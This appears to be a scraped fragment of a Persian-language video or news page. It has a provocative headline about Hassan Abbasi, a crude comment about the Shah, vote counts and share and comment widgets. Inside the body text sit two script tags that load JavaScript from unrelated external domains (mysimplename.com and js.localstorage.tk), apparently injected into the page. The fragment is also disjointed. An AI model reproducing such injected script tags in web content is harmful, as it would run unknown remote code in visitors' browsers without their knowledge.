حسن عباسی لودرگونه از آن مرحوم عبور کرد!!!!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>اگر رفتی تو خونه ی همون شاه تو استخر زن همون شاه شنا کردی خدا همون جا حضرت عزراییل رو میفرسته قبض روحت بکنه<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
39

- 
1

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)